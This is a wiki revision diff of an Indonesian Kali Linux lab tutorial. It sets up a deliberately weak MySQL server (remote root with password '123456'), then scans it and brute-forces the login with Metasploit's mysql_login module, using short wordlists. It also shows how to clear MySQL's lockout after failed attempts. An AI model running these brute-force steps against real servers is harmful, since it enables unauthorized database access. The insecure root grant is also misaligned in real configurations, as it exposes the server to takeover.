Difference between revisions of "Kali Linux: MySQL Login"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| (11 intermediate revisions by the same user not shown) | |||
| Line 2: | Line 2: | ||
| + | ==Buka Ijin Connection MySQL di Server== | ||
| + | |||
| + | lakukan di server yang akan di serang | ||
| + | |||
| + | /etc/mysql/mysql.conf.d | ||
| + | vi mysqld.cnf | ||
| + | |||
| + | ubah | ||
| + | |||
| + | bind-address = 127.0.0.1 | ||
| + | |||
| + | menjadi | ||
| + | |||
| + | # bind-address = 127.0.0.1 | ||
| + | |||
| + | Login ke mysql | ||
| + | |||
| + | mysql -u root -p123456 | ||
| + | |||
| + | ijinkan remote attack .....ketik | ||
| + | |||
| + | GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.0.%' | ||
| + | IDENTIFIED BY '123456' | ||
| + | WITH GRANT OPTION; | ||
| + | FLUSH PRIVILEGES; | ||
| + | |||
| + | |||
| + | restart | ||
| + | |||
| + | /etc/init.d/mysql restart | ||
| + | |||
| + | ==Aktifkan metasploit== | ||
Masuk ke msfconsole | Masuk ke msfconsole | ||
msfconsole thankyou | msfconsole thankyou | ||
| + | |||
| + | |||
| + | ==Cek Versi== | ||
| + | |||
| + | use auxiliary/scanner/mysql/mysql_version | ||
| + | show options | ||
| + | set RHOSTS 192.168.0.100 | ||
| + | set THREADS 20 | ||
| + | run | ||
| + | |||
| + | Akan keluar kira-kira | ||
| + | |||
| + | [*] 192.168.0.100:3306 is running MySQL 5.5.35-1ubuntu1 (protocol 10) | ||
| + | [*] Scanned 1 of 1 hosts (100% complete) | ||
| + | [*] Auxiliary module execution completed | ||
==Hack Login== | ==Hack Login== | ||
| Line 12: | Line 59: | ||
show options | show options | ||
set PASS_FILE /tmp/passes.txt | set PASS_FILE /tmp/passes.txt | ||
| − | set RHOSTS 192.168.0. | + | set RHOSTS 192.168.0.100 |
set USER_FILE /tmp/users.txt | set USER_FILE /tmp/users.txt | ||
run | run | ||
| + | Jika berhasil akan muncul | ||
| + | |||
| + | [-] 192.168.0.100:3306 - 192.168.0.100:3306 - LOGIN FAILED: root:12345 (Incorrect: Access denied for user 'root'@'192.168.0.146' (using password: YES)) | ||
| + | [+] 192.168.0.100:3306 - MYSQL - Success: 'root:123456' | ||
| + | [*] Scanned 1 of 1 hosts (100% complete) | ||
| + | [*] Auxiliary module execution completed | ||
| − | + | Jika terlalu banyak error saat mencoba, biasanya MySQL akan mengunci / me-lock akses kita. Kita dapat mem-flush lock yang ada di server MySQL menggunakan perintah | |
| − | + | mysqladmin flush-hosts | |
| − | + | mysqladmin -u <username-root> -p<password-root> flush-hosts | |
| − | + | mysqladmin -u root -p123456 flush-hosts | |
| − | |||
| − | |||
==Siapkan passes.txt dan users.txt== | ==Siapkan passes.txt dan users.txt== | ||
| Line 53: | Line 104: | ||
* https://www.offensive-security.com/metasploit-unleashed/scanner-mysql-auxiliary-modules/ | * https://www.offensive-security.com/metasploit-unleashed/scanner-mysql-auxiliary-modules/ | ||
| + | * https://hakin9.org/how-to-use-sqlploit/ | ||
Latest revision as of 07:32, 4 April 2017
Sumber: https://www.offensive-security.com/metasploit-unleashed/scanner-mysql-auxiliary-modules/
Buka Ijin Connection MySQL di Server
lakukan di server yang akan di serang
/etc/mysql/mysql.conf.d vi mysqld.cnf
ubah
bind-address = 127.0.0.1
menjadi
# bind-address = 127.0.0.1
Login ke mysql
mysql -u root -p123456
ijinkan remote attack .....ketik
GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.0.%'
IDENTIFIED BY '123456'
WITH GRANT OPTION;
FLUSH PRIVILEGES;
restart
/etc/init.d/mysql restart
Aktifkan metasploit
Masuk ke msfconsole
msfconsole thankyou
Cek Versi
use auxiliary/scanner/mysql/mysql_version show options set RHOSTS 192.168.0.100 set THREADS 20 run
Akan keluar kira-kira
[*] 192.168.0.100:3306 is running MySQL 5.5.35-1ubuntu1 (protocol 10) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Hack Login
use auxiliary/scanner/mysql/mysql_login show options set PASS_FILE /tmp/passes.txt set RHOSTS 192.168.0.100 set USER_FILE /tmp/users.txt run
Jika berhasil akan muncul
[-] 192.168.0.100:3306 - 192.168.0.100:3306 - LOGIN FAILED: root:12345 (Incorrect: Access denied for user 'root'@'192.168.0.146' (using password: YES)) [+] 192.168.0.100:3306 - MYSQL - Success: 'root:123456' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Jika terlalu banyak error saat mencoba, biasanya MySQL akan mengunci / me-lock akses kita. Kita dapat mem-flush lock yang ada di server MySQL menggunakan perintah
mysqladmin flush-hosts mysqladmin -u <username-root> -p<password-root> flush-hosts mysqladmin -u root -p123456 flush-hosts
Siapkan passes.txt dan users.txt
Isi /tmp/passes.txt
12345 123456 1234567 12345678 123456789 secret password p@ssword moodle mediawiki toor s3cr3t
Isi /tmp/users.txt
moodle mediawiki admin root